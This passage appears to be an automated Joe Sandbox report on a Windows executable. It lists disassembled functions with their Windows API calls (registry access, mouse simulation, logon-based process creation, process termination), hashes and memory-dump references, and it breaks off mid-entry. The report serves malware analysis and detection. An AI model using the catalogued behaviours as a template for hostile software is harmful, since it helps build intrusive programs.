                                                                        Similarity
                                                                        • API ID: _memmove$__itow
                                                                        • String ID:
                                                                        • API String ID: 1986091926-0
                                                                        • Opcode ID: 67ed098add8c432d71dfa6de7e51b4397340f8e3224c09c66cfc86f949daf137
                                                                        • Instruction ID: f06979d9a6e280e4cb7bbcfcba3a791517e61a59321f45185d25d94d8658cb50
                                                                        • Opcode Fuzzy Hash: 67ed098add8c432d71dfa6de7e51b4397340f8e3224c09c66cfc86f949daf137
                                                                        • Instruction Fuzzy Hash: 92615F3050065E9BCF01EF68CC82AFE37A5FF55308F084529F959EB292EA35E915CB52
                                                                        Function 008EE308 Relevance: 9.2, APIs: 6, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DispCallFunc.OLEAUT32(?,?,?,?,?,?,?,?), ref: 008EE337
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE349
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 008EE3B5
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE440
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE459
                                                                        • VariantClear.OLEAUT32(?), ref: 008EE4DF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$CallCopyDispFunc
                                                                        • String ID:
                                                                        • API String ID: 2514896190-0
                                                                        • Opcode ID: 485319b807fa8bbc0160d8eb8c3c2093ef29e3709bf054afcdef541f2bd07c79
                                                                        • Instruction ID: 4e064293bd02e89d91483de40a72baced111f2fa6379909b19321ea82846602c
                                                                        • Opcode Fuzzy Hash: 485319b807fa8bbc0160d8eb8c3c2093ef29e3709bf054afcdef541f2bd07c79
                                                                        • Instruction Fuzzy Hash: D051CD31604755AFD7209F19C884A6FB7E4FF8A314F10892EF985DB2A0D731E884CB15
                                                                        Function 009101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                          • Part of subcall function 00910E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0090FDAD,?,?), ref: 00910E31
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009102BD
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009102FD
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00910320
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00910349
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0091038C
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00910399
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                        • String ID:
                                                                        • API String ID: 4046560759-0
                                                                        • Opcode ID: 09a57f657e0d4add2810840f1f99423ffce7a5a6d9588ac1b5ef2502eb3c0046
                                                                        • Instruction ID: 06a79d32e9c92ef5262f23ac1936e3e021fdcf5c5efd519ad720b04175733270
                                                                        • Opcode Fuzzy Hash: 09a57f657e0d4add2810840f1f99423ffce7a5a6d9588ac1b5ef2502eb3c0046
                                                                        • Instruction Fuzzy Hash: 28517E312082049FCB05EF68C845EAFBBE9FF89314F04491DF555872A1DB72D985CB52
                                                                        Function 008EEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 008EEF06
                                                                        • VariantClear.OLEAUT32(00000013), ref: 008EEF78
                                                                        • VariantClear.OLEAUT32(00000000), ref: 008EEFD3
                                                                        • _memmove.LIBCMT ref: 008EEFFD
                                                                        • VariantClear.OLEAUT32(?), ref: 008EF04A
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008EF078
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                        • String ID:
                                                                        • API String ID: 1101466143-0
                                                                        • Opcode ID: 8d7765c7b57a18a79090036e81d4b0e791f8613e4a5b93856a7b22ba63569d8d
                                                                        • Instruction ID: f2de65a6c647eeaa3ef614586a32ea6ae866350918de5f8aae48a59089c11019
                                                                        • Opcode Fuzzy Hash: 8d7765c7b57a18a79090036e81d4b0e791f8613e4a5b93856a7b22ba63569d8d
                                                                        • Instruction Fuzzy Hash: B95179B5A00209EFCB10CF58C884AAAB7F8FF4D314B158569EA49DB351E330E911CFA0
                                                                        Function 008F220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F2258
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F22A3
                                                                        • IsMenu.USER32(00000000), ref: 008F22C3
                                                                        • CreatePopupMenu.USER32 ref: 008F22F7
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 008F2355
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008F2386
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: a10e7fc4d4617198837230a9ca569b160c15fa7f7dd62eb65ffd45b05b6bcb0c
                                                                        • Instruction ID: df1bcbfa27dcdf35cf8ba555ee170780946c58e21d39dee711be34855276d0e4
                                                                        • Opcode Fuzzy Hash: a10e7fc4d4617198837230a9ca569b160c15fa7f7dd62eb65ffd45b05b6bcb0c
                                                                        • Instruction Fuzzy Hash: 585169B060420DDBDF21CFB8D888BBDBBE5FF45318F148269EA55EA2A0D3749944CB51
                                                                        Function 00891765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • BeginPaint.USER32(?,?,?), ref: 0089179A
                                                                        • GetWindowRect.USER32(?,?), ref: 008917FE
                                                                        • ScreenToClient.USER32(?,?), ref: 0089181B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0089182C
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00891876
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008CB87B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: 06381b2b58436ec71a140f7fde8f6152bb598c2dc11509a0406b9e11023e473c
                                                                        • Instruction ID: a911833f0e94d54533f24bfb06c173b2d48c8cdcf9be039ceec2faa9514285c9
                                                                        • Opcode Fuzzy Hash: 06381b2b58436ec71a140f7fde8f6152bb598c2dc11509a0406b9e11023e473c
                                                                        • Instruction Fuzzy Hash: 1E419130218705AFDF10EF25C898FA67BE8FB59364F184628F564C62A2C7309845EB51
                                                                        Function 0091B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(009557B0,00000000,014C4A20,?,?,009557B0,?,0091B5A8,?,?), ref: 0091B712
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 0091B736
                                                                        • ShowWindow.USER32(009557B0,00000000,014C4A20,?,?,009557B0,?,0091B5A8,?,?), ref: 0091B796
                                                                        • ShowWindow.USER32(00000000,00000004,?,0091B5A8,?,?), ref: 0091B7A8
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0091B7CC
                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0091B7EF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 44128a06ba975a87ec4c0260a7e4b81dee21e992c35dbe0ca3d5416e98a88a72
                                                                        • Instruction ID: 6f8a2284f2b1489188c7ae125e7d3433698ce18e4e5091c3a2833da85f5727dc
                                                                        • Opcode Fuzzy Hash: 44128a06ba975a87ec4c0260a7e4b81dee21e992c35dbe0ca3d5416e98a88a72
                                                                        • Instruction Fuzzy Hash: 04416D34704248AFDB22CF24C499BD47BE6FB45310F1881B9E9498FAF2C731A896CB50
                                                                        Function 0090709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00904E41,?,?,00000000,00000001), ref: 009070AC
                                                                          • Part of subcall function 009039A0: GetWindowRect.USER32(?,?), ref: 009039B3
                                                                        • GetDesktopWindow.USER32 ref: 009070D6
                                                                        • GetWindowRect.USER32(00000000), ref: 009070DD
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0090710F
                                                                          • Part of subcall function 008F5244: Sleep.KERNEL32(000000FA,00000000,?,?,?,?,?,?,?,?,00955310,0095546C), ref: 008F52BC
                                                                        • GetCursorPos.USER32(?), ref: 0090713B
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00907199
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: 249ddf1acfe3dbc82caca85583c74f7efe0760ce2c60e2a1685652e2449bb501
                                                                        • Instruction ID: 6199566bef9ceb1d437347524216de44f6b2bd1e07b6a3f0de0192e575395583
                                                                        • Opcode Fuzzy Hash: 249ddf1acfe3dbc82caca85583c74f7efe0760ce2c60e2a1685652e2449bb501
                                                                        • Instruction Fuzzy Hash: 5331D272609309AFD720DF54C849B9BB7AAFF88314F000919F595971D1CA34EA19CB92
                                                                        Function 008E8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E80C0
                                                                          • Part of subcall function 008E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E80CA
                                                                          • Part of subcall function 008E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E80D9
                                                                          • Part of subcall function 008E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008E80E0
                                                                          • Part of subcall function 008E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E80F6
                                                                        • GetLengthSid.ADVAPI32(?,00000000,008E842F), ref: 008E88CA
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008E88D6
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 008E88DD
                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 008E88F6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,008E842F), ref: 008E890A
                                                                        • HeapFree.KERNEL32(00000000), ref: 008E8911
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                        • String ID:
                                                                        • API String ID: 3008561057-0
                                                                        • Opcode ID: fac6f47d08674ed5bfe0fc9895bffd247f6263641ef51dd12fe813be6bcda1ea
                                                                        • Instruction ID: a5bd9494809f681dd9deced1d92fbb6966fa534ff9b116e7dc5e30c56f0832e6
                                                                        • Opcode Fuzzy Hash: fac6f47d08674ed5bfe0fc9895bffd247f6263641ef51dd12fe813be6bcda1ea
                                                                        • Instruction Fuzzy Hash: CE11B131A15209FFDB109FA5DC19BFE7BA8FB46315F108128E849D7211CB329D00DB61
                                                                        Function 008C9958 Relevance: 9.1, APIs: 6, Instructions: 69COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,008C8734,?,?), ref: 008C9974
                                                                        • __calloc_crt.LIBCMT ref: 008C9983
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,014B9378,000000FF,00000000,00000000,00000000,00000000,?,?,008C8734,?,?,?,008C3FCC,0092E500), ref: 008C999F
                                                                        • ___crtsetenv.LIBCMT ref: 008C99AE
                                                                        • _free.LIBCMT ref: 008C99C1
                                                                        • _free.LIBCMT ref: 008C99DC
                                                                          • Part of subcall function 008B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008B9A24), ref: 008B2D69
                                                                          • Part of subcall function 008B2D55: GetLastError.KERNEL32(00000000,?,008B9A24), ref: 008B2D7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapLast___crtsetenv__calloc_crt
                                                                        • String ID:
                                                                        • API String ID: 3554878821-0
                                                                        • Opcode ID: a1f27271c4ca733e6cb9022bacaf9400485de2a01e1ada2ff70dc5d37ac2d811
                                                                        • Instruction ID: d752a31a5a4f1c6164873565f626bc488fb0257cce72a252265a25fca14da6cb
                                                                        • Opcode Fuzzy Hash: a1f27271c4ca733e6cb9022bacaf9400485de2a01e1ada2ff70dc5d37ac2d811
                                                                        • Instruction Fuzzy Hash: C111A731509545BADB215A6A9C09F6F7B7CFBC2B30B30425EF454E21D0DE70D901D621
                                                                        Function 008E85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008E85E2
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008E85E9
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008E85F8
                                                                        • CloseHandle.KERNEL32(00000004), ref: 008E8603
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008E8632
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 008E8646
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: 6e5c661f2b44dfbe3dba0a7e2438982afd1356b3462a76f008ff81b986a1ae01
                                                                        • Instruction ID: 8b60bf933d4114eab9fcd6eb4e80b13f82f03b688338636350c7c533c134f58c
                                                                        • Opcode Fuzzy Hash: 6e5c661f2b44dfbe3dba0a7e2438982afd1356b3462a76f008ff81b986a1ae01
                                                                        • Instruction Fuzzy Hash: 27114A7260424DEBDF02CFA5DD49BDE7BA9FB49344F048064FE08A21A0C7718E61EB60
                                                                        Function 008EB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 008EB7B5
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 008EB7C6
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008EB7CD
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 008EB7D5
                                                                        • MulDiv.KERNEL32(000009EC,008EB465,00000000), ref: 008EB7EC
                                                                        • MulDiv.KERNEL32(000009EC,016A52EC,?), ref: 008EB7FE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$Release
                                                                        • String ID:
                                                                        • API String ID: 1035833867-0
                                                                        • Opcode ID: 9a52b51b1b9a6e542dda533530cbb13e9add010157bfb9de85ea471c010f4e15
                                                                        • Instruction ID: 9852a551a5c60523ca61ac0a81ae46567e0427640ab1bc557a84d6f8b33a4a48
                                                                        • Opcode Fuzzy Hash: 9a52b51b1b9a6e542dda533530cbb13e9add010157bfb9de85ea471c010f4e15
                                                                        • Instruction Fuzzy Hash: 51018475E04209BBEF109BA69C45A9EBFB8EB48351F008075FA04E7291D6309C00CF91
                                                                        Function 008B0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008B0193
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008B019B
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008B01A6
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008B01B1
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008B01B9
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B01C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: e2900b5b6570ee6bdb5e41dcd41c7dfa9f3d8cabb0cc3fff9a3ddc013602bc6e
                                                                        • Instruction ID: 54a0bdb776da47e033bcdb94cd609fe35e83b8599025ce41871cbd7b882292d2
                                                                        • Opcode Fuzzy Hash: e2900b5b6570ee6bdb5e41dcd41c7dfa9f3d8cabb0cc3fff9a3ddc013602bc6e
                                                                        • Instruction Fuzzy Hash: 35016CB0901B5D7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                        Function 008F53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008F53F9
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008F540F
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 008F541E
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F542D
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F5437
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008F543E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: d8325e5c310dfb348e6b9cc3e195249e3815f97b915f6241f3ef5ad4fdc66b40
                                                                        • Instruction ID: 386959b8fc65f8b2fc9703dd64bf32959c279456fa90180cb5a21a06a86aea76
                                                                        • Opcode Fuzzy Hash: d8325e5c310dfb348e6b9cc3e195249e3815f97b915f6241f3ef5ad4fdc66b40
                                                                        • Instruction Fuzzy Hash: 27F06D3225855CBBE3215BA2DC0DEEB7A7CEBC6B51F004169FA04D1061D6A01A01D6B5
                                                                        Function 008F7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(014BEB9C,014BEB9C), ref: 008F7243
